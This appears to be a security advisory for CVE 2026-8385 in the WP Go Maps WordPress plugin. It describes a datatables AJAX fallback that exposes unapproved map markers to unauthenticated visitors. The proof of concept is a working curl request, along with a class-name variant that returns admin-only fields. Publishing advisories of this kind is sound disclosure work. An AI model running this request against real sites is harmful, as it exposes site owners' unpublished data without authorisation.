WP Go Maps < 10.0.10 – Unauthenticated Sensitive Information Disclosure via Datatables AJAX Fallback | CVE 2026-8385

Description

The plugin does not properly enforce the marker approval filter on the admin-ajax fallback for its datatables route, allowing unauthenticated visitors to retrieve marker records that the site owner has not approved for public display, including their title, category, address and description fields.

Proof of Concept

Prerequisite: the plugin is active with at least one map (map_id=1 exists by default after activation) containing markers. Map IDs are sequential auto-increment integers, so the value is trivially enumerable.

As an unauthenticated visitor:

curl -sS "https://example.com/wp-admin/admin-ajax.php" \
  --data-urlencode "action=wpgmza_rest_api_request" \
  --data-urlencode "route=/datatables/" \
  --data-urlencode "phpClass=WPGMZA\\MarkerDataTable" \
  --data-urlencode "map_id=1" \
  --data-urlencode "length=50" \
  --data-urlencode "start=0" \
  --data-urlencode "draw=1"

The response is a datatables JSON object whose `data` array includes every marker for the requested `map_id`, regardless of approval state. For comparison, the same dataset requested via the legitimate REST path `POST /wp-json/wpgmza/v1/markers/datatables/` returns only the approved markers — confirming the AJAX fallback bypasses the filter the REST path applies.

Setting `phpClass=WPGMZA\AdminMarkerDataTable` instead returns the same rows plus per-row `id`, `icon`, `link`, and an HTML actions toolbar.